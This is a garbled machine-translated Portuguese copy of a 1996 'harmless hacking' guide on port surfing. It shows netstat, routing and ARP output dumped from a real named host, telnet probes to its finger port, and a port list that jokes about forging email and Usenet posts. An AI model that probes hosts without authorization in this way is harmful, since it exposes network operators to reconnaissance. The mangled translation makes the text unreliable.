Conexões activas de MultiNet, including usuários: 
Estado (portuário) extrangeiro (portuário) local Proto do endereço do endereço de Receptor-q Snd-Q 
----- ----- ----- ------------------ ------------------ ----- 
TCP 0 822 GRANDE.NM.ORG (NETSTAT) 198.59.115.24 (1569) ESTABELECIDO 
TCP 0 0 GRANDE.NM.ORG (POP3) 164.64.201.67 (1256) ESTABELECIDO
TCP 0 0 GRANDE.NM.ORG (4918) 129.121.254.5 (TELNET) ESTABELECIDOS 
TCP 0 0 GRANDE.NM.ORG (TELNET) AVATAR.NM.ORG (3141) ESTABELECIDOS 
OS TCP 0 0 * (NAMESERVICE) * (*) ESCUTAM 
OS TCP 0 0 * (TELNET) * (*) ESCUTAM 
OS TCP 0 0 * (FTP) * (*) ESCUTAM 
OS TCP 0 0 * (DEDO) * (*) ESCUTAM 
OS TCP 0 0 * (NETSTAT) * (*) ESCUTAM 
OS TCP 0 0 * (SMTP) * (*) ESCUTAM 
OS TCP 0 0 * (INÍCIO DE UMA SESSÃO) * (*) ESCUTAM 
OS TCP 0 0 * (SHELL) * (*) ESCUTAM 
OS TCP 0 0 * (EXEC) * (*) ESCUTAM 
OS TCP 0 0 * (RPC) * (*) ESCUTAM 
OS TCP 0 0 * (NETCONTROL) * (*) ESCUTAM 
OS TCP 0 0 * (SYSTAT) * (*) ESCUTAM 
OS TCP 0 0 * (CHARGEN) * (*) ESCUTAM 
OS TCP 0 0 * (DIA) * (*) ESCUTAM 
OS TCP 0 0 * (TEMPO) * (*) ESCUTAM 
OS TCP 0 0 * (ECO) * (*) ESCUTAM 
OS TCP 0 0 * (DESCARTE) * (*) ESCUTAM 
OS TCP 0 0 * (IMPRESSORA) * (*) ESCUTAM 
OS TCP 0 0 * (POP2) * (*) ESCUTAM 
OS TCP 0 0 * (POP3) * (*) ESCUTAM 
OS TCP 0 0 * (KERBEROS_MASTER) * (*) ESCUTAM 
OS TCP 0 0 * (KLOGIN) * (*) ESCUTAM 
OS TCP 0 0 * (KSHELL) * (*) ESCUTAM 
TCP 0 0 GRANDE.NM.ORG (4174) OSO.NM.ORG (X11) ESTABELECIDOS 
TCP 0 0 GRANDE.NM.ORG (4172) OSO.NM.ORG (X11) ESTABELECIDOS 
TCP 0 0 GRANDE.NM.ORG (4171) OSO.NM.ORG (X11) ESTABELECIDOS 
OS TCP 0 0 * (FS) * (*) ESCUTAM 
UDP 0 0 * (NAMESERVICE) * (*) 
UDP 0 0 127.0.0.1 (NAMESERVICE) * (*) 
UDP 0 0 GRANDE.NM.OR (NAMESERV) * (*) 
UDP 0 0 * (TFTP) * (*) 
UDP 0 0 * (BOOTPS) * (*) 
UDP 0 0 * (KERBEROS) * (*) 
UDP 0 0 127.0.0.1 (KERBEROS) * (*) 
UDP 0 0 GRANDE.NM.OR (KERBEROS) * (*) 
UDP 0 0 * (*) * (*) 
UDP 0 0 * (SNMP) * (*) 
UDP 0 0 * (RPC) * (*) 
UDP 0 0 * (DIA) * (*) 
UDP 0 0 * (ECO) * (*) 
UDP 0 0 * (DESCARTE) * (*) 
UDP 0 0 * (TEMPO) * (*) 
UDP 0 0 * (CHARGEN) * (*)
UDP 0 0 * (CONVERSA) * (*) 
UDP 0 0 * (NTALK) * (*) 
UDP 0 0 * (1023) * (*) 
UDP 0 0 * (XDMCP) * (*) 
MultiNet registou programas do RPC: 
Porto do protocolo da versão do programa 
------- ------- -------- ---- 
PORTMAP 2 TCP 111 
UDP 111 DE PORTMAP 2 
Tabelas de roteamento do IP de MultiNet: 
MTU da relação do uso de Refcnt das bandeiras da passagem do destino 
---------- ---------- ----- ------ ----- --------- ---- 
198.59.167.1 LAWRII.NM.ORG acima, passagem, H 0 2 se0 1500 
166.45.0.1 ENSS365.NM.ORG acima, passagem, H 0 4162 se0 1500 
205.138.138.1 ENSS365.NM.ORG acima, passagem, H 0 71 se0 1500 
204.127.160.1 ENSS365.NM.ORG acima, passagem, H 0 298 se0 1500 
127.0.0.1 127.0.0.1 acima, hospeda 5 1183513 lo0 4136 
198.59.167.2 LAWRII.NM.ORG acima, passagem, H 0 640 se0 1500 
192.132.89.2 ENSS365.NM.ORG acima, passagem, H 0 729 se0 1500 
207.77.56.2 ENSS365.NM.ORG acima, passagem, H 0 5 se0 1500 
204.97.213.2 ENSS365.NM.ORG acima, passagem, H 0 2641 se0 1500 
194.90.74.66 ENSS365.NM.ORG acima, passagem, H 0 1 se0 1500 
204.252.102.2 ENSS365.NM.ORG acima, passagem, H 0 109 se0 1500 
205.160.243.2 ENSS365.NM.ORG acima, passagem, H 0 78 se0 1500 
202.213.4.2 ENSS365.NM.ORG acima, passagem, H 0 4 se0 1500 
202.216.224.66 ENSS365.NM.ORG acima, passagem, H 0 113 se0 1500 
192.132.89.3 ENSS365.NM.ORG acima, passagem, H 0 1100 se0 1500 
198.203.196.67 ENSS365.NM.ORG acima, passagem, H 0 385 se0 1500 
160.205.13.3 ENSS365.NM.ORG acima, passagem, H 0 78 se0 1500 
202.247.107.131 ENSS365.NM.ORG acima, passagem, H 0 19 se0 1500 
198.59.167.4 LAWRII.NM.ORG acima, passagem, H 0 82 se0 1500 
128.148.157.6 ENSS365.NM.ORG acima, passagem, H 0 198 se0 1500 
160.45.10.6 ENSS365.NM.ORG acima, passagem, H 0 3 se0 1500 
128.121.50.7 ENSS365.NM.ORG acima, passagem, H 0 3052 se0 1500 
206.170.113.8 ENSS365.NM.ORG acima, passagem, H 0 1451 se0 1500 
128.148.128.9 ENSS365.NM.ORG acima, passagem, H 0 1122 se0 1500 
203.7.132.9 ENSS365.NM.ORG acima, passagem, H 0 14 se0 1500 
204.216.57.10 ENSS365.NM.ORG acima, passagem, H 0 180 se0 1500 
130.74.1.75 ENSS365.NM.ORG acima, passagem, H 0 10117 se0 1500 
206.68.65.15 ENSS365.NM.ORG acima, passagem, H 0 249 se0 1500 
129.219.13.81 ENSS365.NM.ORG acima, passagem, H 0 547 se0 1500 
204.255.246.18 ENSS365.NM.ORG acima, passagem, H 0 1125 se0 1500 
160.45.24.21 ENSS365.NM.ORG acima, passagem, H 0 97 se0 1500 
206.28.168.21 ENSS365.NM.ORG acima, passagem, H 0 2093 se0 1500 
163.179.3.222 ENSS365.NM.ORG acima, passagem, H 0 315 se0 1500 
198.109.130.33 ENSS365.NM.ORG acima, passagem, H 0 1825 se0 1500 
199.224.108.33 ENSS365.NM.ORG acima, passagem, H 0 11362 se0 1500
203.7.132.98 ENSS365.NM.ORG acima, passagem, H 0 73 se0 1500 
198.111.253.35 ENSS365.NM.ORG acima, passagem, H 0 1134 se0 1500 
206.149.24.100 ENSS365.NM.ORG acima, passagem, H 0 3397 se0 1500 
165.212.105.106 ENSS365.NM.ORG acima, passagem, H 0 17 se0 1006 
205.238.3.241 ENSS365.NM.ORG acima, passagem, H 0 69 se0 1500 
198.49.44.242 ENSS365.NM.ORG acima, passagem, H 0 25 se0 1500 
194.22.188.242 ENSS365.NM.ORG acima, passagem, H 0 20 se0 1500 
164.64.0 LAWRII.NM.ORG acima, passagem 1 40377 se0 1500 
0.0.0 ENSS365.NM.ORG acima, passagem 2 4728741 se0 1500 
207.66.1 GLORY.NM.ORG acima, passagem 0 51 se0 1500 
205.166.1 GLORY.NM.ORG acima, passagem 0 1978 se0 1500 
204.134.1 LAWRII.NM.ORG acima, passagem 0 54 se0 1500 
204.134.2 GLORY.NM.ORG acima, passagem 0 138 se0 1500 
192.132.2 129.121.248.1 acima, passagem 0 6345 se0 1500 
204.134.67 GLORY.NM.ORG acima, passagem 0 2022 se0 1500 
206.206.67 GLORY.NM.ORG acima, passagem 0 7778 se0 1500 
206.206.68 LAWRII.NM.ORG acima, passagem 0 3185 se0 1500 
207.66.5 GLORY.NM.ORG acima, passagem 0 626 se0 1500 
204.134.69 GLORY.NM.ORG acima, passagem 0 7990 se0 1500 
207.66.6 GLORY.NM.ORG acima, passagem 0 53 se0 1500 
204.134.70 LAWRII.NM.ORG acima, passagem 0 18011 se0 1500 
192.188.135 GLORY.NM.ORG acima, passagem 0 5 se0 1500 
206.206.71 LAWRII.NM.ORG acima, passagem 0 2 se0 1500 
204.134.7 GLORY.NM.ORG acima, passagem 0 38 se0 1500 
199.89.135 GLORY.NM.ORG acima, passagem 0 99 se0 1500 
198.59.136 LAWRII.NM.ORG acima, passagem 0 1293 se0 1500 
204.134.9 GLORY.NM.ORG acima, passagem 0 21 se0 1500 
204.134.73 GLORY.NM.ORG acima, passagem 0 59794 se0 1500 
129.138.0 GLORY.NM.ORG acima, passagem 0 5262 se0 1500 
192.92.10 LAWRII.NM.ORG acima, passagem 0 163 se0 1500 
206.206.75 LAWRII.NM.ORG acima, passagem 0 604 se0 1500 
207.66.13 GLORY.NM.ORG acima, passagem 0 1184 se0 1500 
204.134.77 LAWRII.NM.ORG acima, passagem 0 3649 se0 1500 
207.66.14 GLORY.NM.ORG acima, passagem 0 334 se0 1500 
204.134.78 GLORY.NM.ORG acima, passagem 0 239 se0 1500 
204.52.207 GLORY.NM.ORG acima, passagem 0 293 se0 1500 
204.134.79 GLORY.NM.ORG acima, passagem 0 1294 se0 1500 
192.160.144 LAWRII.NM.ORG acima, passagem 0 117 se0 1500 
206.206.80 PENNY.NM.ORG acima, passagem 0 4663 se0 1500 
204.134.80 GLORY.NM.ORG acima, passagem 0 91 se0 1500 
198.99.209 LAWRII.NM.ORG acima, passagem 0 1136 se0 1500 
207.66.17 GLORY.NM.ORG acima, passagem 0 24173 se0 1500 
204.134.82 GLORY.NM.ORG acima, passagem 0 29766 se0 1500 
192.41.211 GLORY.NM.ORG acima, passagem 0 155 se0 1500 
192.189.147 LAWRII.NM.ORG acima, passagem 0 3133 se0 1500 
204.134.84 PENNY.NM.ORG acima, passagem 0 189 se0 1500 
204.134.87 LAWRII.NM.ORG acima, passagem 0 94 se0 1500
146.88.0 GLORY.NM.ORG acima, passagem 0 140 se0 1500 
192.84.24 GLORY.NM.ORG acima, passagem 0 3530 se0 1500 
204.134.88 LAWRII.NM.ORG acima, passagem 0 136 se0 1500 
198.49.217 GLORY.NM.ORG acima, passagem 0 303 se0 1500 
192.132.89 GLORY.NM.ORG acima, passagem 0 3513 se0 1500 
198.176.219 GLORY.NM.ORG acima, passagem 0 1278 se0 1500 
206.206.92 LAWRII.NM.ORG acima, passagem 0 1228 se0 1500 
192.234.220 129.121.1.91 acima, passagem 0 2337 se0 1500 
204.134.92 LAWRII.NM.ORG acima, passagem 0 13995 se0 1500 
198.59.157 LAWRII.NM.ORG acima, passagem 0 508 se0 1500 
206.206.93 GLORY.NM.ORG acima, passagem 0 635 se0 1500 
204.134.93 GLORY.NM.ORG acima, passagem 0 907 se0 1500 
198.59.158 LAWRII.NM.ORG acima, passagem 0 14214 se0 1500 
198.59.159 LAWRII.NM.ORG acima, passagem 0 1806 se0 1500 
204.134.95 PENNY.NM.ORG acima, passagem 0 3644 se0 1500 
206.206.96 GLORY.NM.ORG acima, passagem 0 990 se0 1500 
206.206.161 LAWRII.NM.ORG acima, passagem 0 528 se0 1500 
198.59.97 PENNY.NM.ORG acima, passagem 0 55 se0 1500 
198.59.161 LAWRII.NM.ORG acima, passagem 0 497 se0 1500 
192.207.226 GLORY.NM.ORG acima, passagem 0 93217 se0 1500 
198.59.99 PENNY.NM.ORG acima, passagem 0 2 se0 1500 
198.59.163 GLORY.NM.ORG acima, passagem 0 3379 se0 1500 
192.133.100 LAWRII.NM.ORG acima, passagem 0 3649 se0 1500 
204.134.100 GLORY.NM.ORG acima, passagem 0 8 se0 1500 
128.165.0 PENNY.NM.ORG acima, passagem 0 15851 se0 1500 
198.59.165 GLORY.NM.ORG acima, passagem 0 274 se0 1500 
206.206.165 LAWRII.NM.ORG acima, passagem 0 167 se0 1500 
206.206.102 GLORY.NM.ORG acima, passagem 0 5316 se0 1500 
160.230.0 LAWRII.NM.ORG acima, passagem 0 19408 se0 1500 
206.206.166 LAWRII.NM.ORG acima, passagem 0 1756 se0 1500 
205.166.231 GLORY.NM.ORG acima, passagem 0 324 se0 1500 
198.59.167 GLORY.NM.ORG acima, passagem 0 1568 se0 1500 
206.206.103 GLORY.NM.ORG acima, passagem 0 3629 se0 1500 
198.59.168 GLORY.NM.ORG acima, passagem 0 9063 se0 1500 
206.206.104 GLORY.NM.ORG acima, passagem 0 7333 se0 1500 
206.206.168 GLORY.NM.ORG acima, passagem 0 234 se0 1500 
204.134.105 LAWRII.NM.ORG acima, passagem 0 4826 se0 1500 
206.206.105 LAWRII.NM.ORG acima, passagem 0 422 se0 1500 
204.134.41 LAWRII.NM.ORG acima, passagem 0 41782 se0 1500 
206.206.169 GLORY.NM.ORG acima, passagem 0 5101 se0 1500 
204.134.42 GLORY.NM.ORG acima, passagem 0 10761 se0 1500 
206.206.170 GLORY.NM.ORG acima, passagem 0 916 se0 1500 
198.49.44 GLORY.NM.ORG acima, passagem 0 3 se0 1500 
198.59.108 GLORY.NM.ORG acima, passagem 0 2129 se0 1500 
204.29.236 GLORY.NM.ORG acima, passagem 0 125 se0 1500 
206.206.172 GLORY.NM.ORG acima, passagem 0 5839 se0 1500 
204.134.108 GLORY.NM.ORG acima, passagem 0 3216 se0 1500
206.206.173 GLORY.NM.ORG acima, passagem 0 374 se0 1500 
198.175.173 LAWRII.NM.ORG acima, passagem 0 6227 se0 1500 
198.59.110 GLORY.NM.ORG acima, passagem 0 1797 se0 1500 
198.51.238 GLORY.NM.ORG acima, passagem 0 1356 se0 1500 
192.136.110 GLORY.NM.ORG acima, passagem 0 583 se0 1500 
204.134.48 GLORY.NM.ORG acima, passagem 0 42 se0 1500 
198.175.176 LAWRII.NM.ORG acima, passagem 0 32 se0 1500 
206.206.114 LAWRII.NM.ORG acima, passagem 0 44 se0 1500 
206.206.179 LAWRII.NM.ORG acima, passagem 0 14 se0 1500 
198.59.179 PENNY.NM.ORG acima, passagem 0 222 se0 1500 
198.59.115 GLORY.NM.ORG acima, passagem 1 132886 se0 1500 
206.206.181 GLORY.NM.ORG acima, passagem 0 1354 se0 1500 
206.206.182 SIENNA.NM.ORG acima, passagem 0 16 se0 1500 
206.206.118 GLORY.NM.ORG acima, passagem 0 3423 se0 1500 
206.206.119 GLORY.NM.ORG acima, passagem 0 282 se0 1500 
206.206.183 SIENNA.NM.ORG acima, passagem 0 2473 se0 1500 
143.120.0 LAWRII.NM.ORG acima, passagem 0 123533 se0 1500 
206.206.184 GLORY.NM.ORG acima, passagem 0 1114 se0 1500 
205.167.120 GLORY.NM.ORG acima, passagem 0 4202 se0 1500 
206.206.121 GLORY.NM.ORG acima, passagem 1 71 se0 1500 
129.121.0 GRANDE.NM.ORG levantam 12 21658599 se0 1500 
204.134.122 GLORY.NM.ORG acima, passagem 0 195 se0 1500 
204.134.58 GLORY.NM.ORG acima, passagem 0 7707 se0 1500 
128.123.0 GLORY.NM.ORG acima, passagem 0 34416 se0 1500 
204.134.59 GLORY.NM.ORG acima, passagem 0 1007 se0 1500 
204.134.124 GLORY.NM.ORG acima, passagem 0 37160 se0 1500 
206.206.124 LAWRII.NM.ORG acima, passagem 0 79 se0 1500 
206.206.125 PENNY.NM.ORG acima, passagem 0 233359 se0 1500 
204.134.126 GLORY.NM.ORG acima, passagem 0 497 se0 1500 
206.206.126 LAWRII.NM.ORG acima, passagem 0 13644 se0 1500 
204.69.190 GLORY.NM.ORG acima, passagem 0 4059 se0 1500 
206.206.190 GLORY.NM.ORG acima, passagem 0 1630 se0 1500 
204.134.127 GLORY.NM.ORG acima, passagem 0 45621 se0 1500 
206.206.191 GLORY.NM.ORG acima, passagem 0 3574 se0 1500 
Tabelas de roteamento do IPX de MultiNet: 
MTU da relação do uso de Refcnt das bandeiras da passagem do destino 
---------- ---------- ----- ------ ----- --------- ---- 
Tabela de MultiNet ARP: 
Bandeiras do Arp do endereço do Ethernet do endereço de rede do anfitrião 
-------------------------------------------- ---------------- --------- 
GLORY.NM.ORG (IP 129.121.1.4) AA:00:04:00:61:D0 provisório 
[DESCONHECIDO] (IP 129.121.251.1) 00:C0:05:01:2C:D2 provisório 
08:00 DE NARANJO.NM.ORG (IP 129.121.1.56):87:04:9F:42 provisório 
CHAMA.NM.ORG (IP 129.121.1.8) AA:00:04:00:0C:D0 provisório 
[DESCONHECIDO] (IP 129.121.251.5) AA:00:04:00:D2:D0 provisório 
LAWRII.NM.ORG (IP 129.121.254.10) AA:00:04:00:5C:D0 provisório 
[DESCONHECIDO] (IP 129.121.1.91) 00:C0:05:01:2C:D2 provisório
BRAVO.NM.ORG (IP 129.121.1.6) AA:00:04:00:0B:D0 provisório 
PENNY.NM.ORG (IP 129.121.1.10) AA:00:04:00:5F:D0 provisório 
08:00 DE ARRIBA.NM.ORG (IP 129.121.1.14):2B:BC:C1:A7 provisório 
08:00 DE AZUL.NM.ORG (IP 129.121.1.51):87:00:A1:D3 provisório 
00:00 DE ENSS365.NM.ORG (IP 129.121.1.3):0C:51:EF:58 provisório 
08:00 DE AVATAR.NM.ORG (IP 129.121.254.1):5A:1D:52:0D provisório 
[DESCONHECIDO] (IP 129.121.253.2) 08:00:5A:47:4A:1D provisório 
[DESCONHECIDO] (IP 129.121.254.5) 00:C0:7B:5F:5F:80 provisório 
08:00 DE CONCHAS.NM.ORG (IP 129.121.1.11):5A:47:4A:1D provisório 
[DESCONHECIDO] (IP 129.121.253.10) AA:00:04:00:4B:D0 provisório 
Estatísticas da relação de rede de MultiNet: 
Endereço de rede conhecido Ipkts do MTU Ierrs Opkts Oerrs Collis 
---- --- ------- -------------- ----- ----- ----- ----- ------ 
se0 1500 129.121.0 GRANDE.NM.ORG 68422948 0 53492833 1 0 
lo0 4136 127.0.0 127.0.0.1 1188191 0 1188191 0 0 
Estatísticas do protocolo de MultiNet: 
65264173 pacotes do IP recebidos 
Tamanho menor do que mínimo de 22 pacotes do IP 
6928 fragmentos do IP recebidos 
4 fragmentos do IP cronometrados para fora 
IP 34 recebido para destinos unreachable 
704140 pacotes do erro do ICMP gerados 
9667 opcodes do ICMP fora da escala 
4170 somas de controle más do pacote do ICMP 
734363 respostas do ICMP 
734363 pacotes do “eco” do ICMP recebidos 
734363 do “pacotes da resposta eco” do ICMP emitidos 
18339 do “pacotes da resposta eco” do ICMP recebidos 
704140 ICMP do “pacotes Unreachable destino” emitidos 
451243 ICMP do “pacotes Unreachable destino” recebidos 
o ICMP 1488 “fonte extingue” os pacotes recebidos 
o ICMP 163911 “reorienta” os pacotes recebidos 
189732 pacotes excedidos “tempo” do ICMP recebidos 
126966 conexões do TCP iniciadas 
233998 conexões do TCP estabelecidas 
132611 conexões do TCP aceitadas 
67972 conexões do TCP deixadas cair 
28182 conexões embrionárias do TCP deixadas cair 
269399 conexões do TCP fechados 
10711838 segmentos do TCP cronometrados para o RTT 
RTT actualizado de 10505140 segmentos do TCP 
ACKs atrasado 3927264 TCP emitido 
666 devidos deixados cair conexões do TCP retransmitir intervalos de parada 
111040 TCP retransmitem intervalos de parada 
3136 TCP persistem intervalos de parada 
9 TCP persistem gotas da conexão 
16850 intervalos de parada do keepalive do TCP
1195 pontas de prova do keepalive do TCP emitidas 
14392 deixados cair conexões do TCP devido aos intervalos de parada do keepalive 
28842663 pacotes do TCP emitidos 
12714484 pacotes de dados do TCP emitidos 
1206060086 bytes de dados do TCP emitidos 
58321 pacotes de dados do TCP retransmitidos 
22144036 bytes de dados do TCP retransmitidos 
6802199 pacotes do TCP ACK-somente emitidos 
1502 pontas de prova da janela do TCP emitidas 
483 pacotes do TCP URG-only emitidos 
8906175 pacotes da Janela-Actualização-somente do TCP emitidos 
359509 pacotes de controle do TCP emitidos 
38675084 pacotes do TCP recebidos 
28399363 pacotes do TCP recebidos em ordem 
1929418386 bytes do TCP recebidos em ordem 
25207 pacotes do TCP com erros da soma de controle 
273374 pacotes do TCP eram duplicatas 
230525708 bytes do TCP eram duplicatas 
3748 pacotes do TCP tiveram alguns bytes duplicados 
493214 bytes do TCP eram duplicatas parciais 
2317156 pacotes do TCP eram avariados 
3151204672 bytes do TCP eram avariados 
1915 pacotes do TCP tiveram dados após a janela 
865443 bytes do TCP eram após a janela 
5804 pacotes do TCP para a conexão já fechado 
941 pacotes do TCP eram pontas de prova da janela 
10847459 pacotes do TCP tiveram ACKs 
222657 pacotes do TCP tiveram ACKs duplicado 
1 dados unsent de ACKed do pacote do TCP 
1200274739 bytes ACKed do TCP 
141545 pacotes do TCP tiveram actualizações da janela 
13 deixados cair segmentos do TCP devido às PATAS 
4658158 segmentos do TCP eram puros-ACKs previsto 
24033756 segmentos do TCP eram puro-dados previstos 
8087980 faltas de esconderijo do PWB do TCP 
305 somas de controle más do encabeçamento do UDP 
17 campos maus do comprimento de dados do UDP 
23772272 faltas de esconderijo do PWB do UDP 
Estatísticas do amortecedor de MultiNet: 
388 de 608 amortecedores no uso: 
30 amortecedores alocados aos dados. 
10 amortecedores alocados aos encabeçamentos de pacote. 
66 amortecedores alocados às estruturas do soquete. 
57 amortecedores alocados aos blocos de controle do protocolo. 
163 amortecedores alocados às entradas de tabela do roteamento. 
2 amortecedores alocados aos nomes e aos endereços do soquete. 
48 amortecedores alocados aos Forquilha-Processos da semente.
2 amortecedores alocados aos endereços da relação. 
1 amortecedor alocado para multicast endereços. 
1 amortecedor alocado às rechamadas do intervalo de parada. 
6 amortecedores alocados à gerência de memória. 
2 amortecedores alocados aos blocos de controle do TTY da rede. 
11 de 43 conjuntos da página no uso. 
11 CXBs pedido dos excitadores de dispositivo do VMS 
2 CXBs que espera para retornar aos excitadores de dispositivo do VMS 
162 Kbytes alocados aos amortecedores de MultiNet (44% no uso). 
226 Kbytes do espaço de endereço alocado do amortecedor (0% do máximo). 
Conexão fechado pelo anfitrião extrangeiro. 
<slug> [68] - > 
Whoa! Que era todo o isso? 
O que nós fizemos era telnet para mover 15 -- o porto do netstat-- qual em alguns computadores funciona um demónio que diga qualquer um que se importa para deixar cair apenas em aproximadamente tudo sobre a conexão feita por todos os computadores lig ao Internet através deste computador. 
Assim desta nós aprendemos duas coisas: 
Grande.nm.org é um computador muito ocupado e importante. 
Mesmo um computador muito ocupado e importante pode deixar o surfista portuário aleatório vir e jogar. 
Assim meu amigo de senhora quis tentar um outro porto. Eu sugeri o porto do dedo, número 79. Assim deu o comando: 
>telnet grande.nm.org 79 do <slug> [68] - 
129.121.1.2 de tentativa… 
Conectado a grande.nm.org. 
O carácter de escape é “^]”. 
dedo 
?Pesaroso, não podia encontrar o “DEDO” 
Conexão fechado pelo anfitrião extrangeiro. 
>telnet grande.nm.org 79 do <slug> [69] - 
129.121.1.2 de tentativa… 
Conectado a grande.nm.org. 
O carácter de escape é “^]”. 
ajuda 
?Pesaroso, não podia encontrar a “AJUDA” 
Conexão fechado pelo anfitrião extrangeiro. 
>telnet grande.nm.org 79 do <slug> [69] - 
129.121.1.2 de tentativa… 
Conectado a grande.nm.org. 
O carácter de escape é “^]”. 
? 
?Pesaroso, não podia encontrar “?” 
Conexão fechado pelo anfitrião extrangeiro. 
>telnet grande.nm.org 79 do <slug> [69] - 
129.121.1.2 de tentativa… 
Conectado a grande.nm.org.
O carácter de escape é “^]”. 
homem 
?Pesaroso, não podia encontrar o “HOMEM” 
Conexão fechado pelo anfitrião extrangeiro. 
<slug> [69] - > 
Início neste olha como apenas um grupo de comandos falhs. Mas realmente isto é consideravelmente fascinante. A razão é que o porto 79 é, sob o IETF governa, supor para funcionar o fingerd, demónio do dedo. Assim quando deu o comando “dedo” e grande.nm.org disse?Pesarosos, não poderíamos encontrar o “DEDO,” nós soubemos que este porto não era seguintes réguas do IETF. 
Agora podem sobre os computadores que não funcionam o demónio do dedo de todo. Isto é porque o dedo tem assim as propriedades que podem ser usadas para ganhar o controle total do computador que funcionamentos ele. 
Mas se o dedo é interrompido, e nada mais está funcionando no porto 79, nós começ a resposta: 
telnet: conectar: Conexão recusada. 
Mas preferivelmente nós começ conectados e grande.nm.org esperava um comando. 
Agora a coisa normal um surfista portuário faz quando funcionar um demónio unfmiliar é a persuadir em revelar que comandos usa. “Ajuda,” “?” e trabalho do “homem” frequentemente. Mas não nos ajudou. 
Mas mesmo que estes comandos não nos ajudassem, disseram-nos que o demónio é provavelmente algo sensível. Se era um demónio que fosse significado para que qualquer um e seu irmão se use, dar-nos-ia instruções. 
Assim que nós fizemos em seguida? Nós decidimos ser bons cidadãos do Internet e permanecer igualmente fora da cadeia que nós decidimos que nós término de uma sessão do beter. 
Mas havia um corte que nós decidimos fazer primeiramente: deixar nossa marca na lima de registro do escudo. 
A lima de registro do escudo mantem um registro de todos os comandos do sistema de exploração feitos em um computador. O adminsitrator de um computador obviamente importante tal como grande.nm.org é provavelmente competente bastante fazer a varredura dos registros de que comandos são dados quem a seu computador. Especialmente em um importante portuário bastante funcionar um mistério, demónio não-IETF. Tão tudo nós tipos quando conectados fomos conservados em um registro. 
Assim meu amigo giggled com alegria e deixou algumas mensagens no porto 79 antes de finalizar a sessão. Oh, caro, eu acredito que enganchou no corte. Hmmm, podia ser uma boa maneira de encontrar sysadmins bonitos… 
Assim, ressaca portuária acima! Se você quer surfar, estão aqui os princípios: 
Começ entrado a um cliente de escudo. Aquele é um cliente com seu ISP que o deixa dar comandos de Unix. Ou -- funcionar o linux ou o algum outro tipo de Unix em seus PC e gancho até o Internet. 
Dar o comando do “number> do <pot do <hostname> telnet “onde o <hostname> é o internet address do computador que você quer visitar e number> do <port é o que quer que lhe olha o phun. 
Se você começ a resposta “conectada ao <hostname>,” então ressaca acima!
Seguir é alguns de meus portos favoritos. É legal e inofensivo pagar-lhes visitas contanto que você não figura para fora como ganhar o status do superuser ao jogar com elas. Entretanto, anotar por favor que se você faz demasiado porto que surfa de seu cliente de escudo, seu sysadmin pode observar este em sua lima de registro do escudo. Se ou são prejudic de encontro ao corte, você pode começ retrocedido fora seu ISP. Assim você pode querer explicar adiantado que você é meramente um cabouqueiro inofensivo que olha para ter uma boa estadia, er, um, aprende sobre Unix. Yeh, de que soa bom… 
Serviço do número portuário porque é phun! 
7 eco o que quer que você dactilografa dentro, as repetições do anfitrião de volta a você, usado para o sibilo 
colaborador de 9 descartes/zero -- como rapidamente pode você figurar para fora este? 
11 lotes do systat da informação em usuários 
hora e data do dia 13 na posição do computador 
informação tremenda de 15 netstat em redes mas usada raramente mais 
o chargen 19 derrama para fora um córrego de carácteres de ASCII. Usar o ^C para parar. 
21 limas de transferências do ftp 
início de uma sessão seguro do escudo de 22 ssh -- túnel cifrado 
telnet 23 onde você entra se você não usa o ssh:) 
email da forja de 25 smpt de Bill.Gates@Microsoft.org. 
tempo de 37 vezes 
posição do recurso de 39 rlp 
informação do WHOIS 43 em anfitriões e em redes 
domain name server 53 
caçador expirado da informação do Gopher 70 
79 lotes do dedo da informação em usuários 
web server do HTTP 80 
email entrante de 110 PNF 
119 grupos da notícia de USENET do NNTP -- bornes da forja, cancelamentos 
shttp 443 um outro web server 
notificação do correio do biff 512 
remote login do rlogin 513 
quem remoto quem e uptime 
comando remoto de 514 escudos, nenhuma senha usada! 
registo do sistema remoto do syslog -- como nós rebentamos cabouqueiros 
Routing Information Protocol de 520 rotas 
************************** 
Ponta da cabeça da hélice: Anotar que na maioria dos casos um anfitrião do Internet usará estas atribuições do número portuário para estes serviços. Mais de um serviço pode igualmente ser atribuído simultaneamente ao mesmo porto. Este sistema de numeração é oferecido voluntàriamente pelo Internet Engineering Task Force. Isso significa que um anfitrião do Internet pode usar outros portos para estes serviços. Esperar o inesperado! 
Se você tem uma cópia do linux, você pode começ a lista de todas as atribuições do IETF dos números portuários na lima /etc/services.
******************************** 
_______________________________________________________ 
Para subscrever à lista feliz do cabouqueiro, o email hacker@techbroker.com com messge “subscreve o hh.” Emitir-me nenhuns exames das actividades ilegais) o uso confidencial cmeinel@techbroker.com do email (por favor. Dirigir por favor flamas ao colaborador/null@techbroker.com. Corte feliz! 
Direitos reservados Carolyn 1996 P. Meinel. Você pode enviar o GUIA (na maior parte) AO CORTE INOFENSIVO contanto que você deixar esta observação na extremidade. 
______________________________________________________

Mais conteúdo relacionado

Mais procurados

Curso de redes aula 1
Curso de redes aula 1Curso de redes aula 1
Curso de redes aula 1
Alax Ricard
 
Sniffers Parte 2
Sniffers   Parte 2Sniffers   Parte 2
Sniffers Parte 2
Felipe Santos
 
Ultrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueandoUltrasurf - Entendendo e bloqueando
Ultrasurf - Entendendo e bloqueando
marcusburghardt
 
Sniffers
SniffersSniffers
Sniffers
JErickPPTs
 
Cloud computing
Cloud computingCloud computing
Cloud computing
Euler Goncalves
 
Tcp transmission control protocol e ip internet protocol
Tcp  transmission control protocol e ip internet protocolTcp  transmission control protocol e ip internet protocol
Tcp transmission control protocol e ip internet protocol
redesinforma
 
Vpn alan-rafael
Vpn alan-rafaelVpn alan-rafael
Vpn alan-rafael
Paulo Henrique Henrique
 
Linux Redes e Servidores - guia pratico
Linux  Redes e Servidores - guia pratico Linux  Redes e Servidores - guia pratico
Linux Redes e Servidores - guia pratico
SoftD Abreu
 
Aula de Redes para concursos
Aula de Redes para concursosAula de Redes para concursos
Aula de Redes para concursos
Julio Oliveira
 
Tecnologias de informação e comunicação
Tecnologias de informação e comunicaçãoTecnologias de informação e comunicação
Tecnologias de informação e comunicação
telmaberto
 
Etec ai -30- internet
Etec   ai -30- internetEtec   ai -30- internet
Etec ai -30- internet
Nutsha De luca
 
Guardando dados na nuvem
Guardando dados na nuvemGuardando dados na nuvem
Guardando dados na nuvem
Abel Sidney Souza
 
34 tutorial sobre_rede-cabos-grimpagem-hub_switch
34 tutorial sobre_rede-cabos-grimpagem-hub_switch34 tutorial sobre_rede-cabos-grimpagem-hub_switch
34 tutorial sobre_rede-cabos-grimpagem-hub_switch
Marcus Vinicius Ferreira Rosado
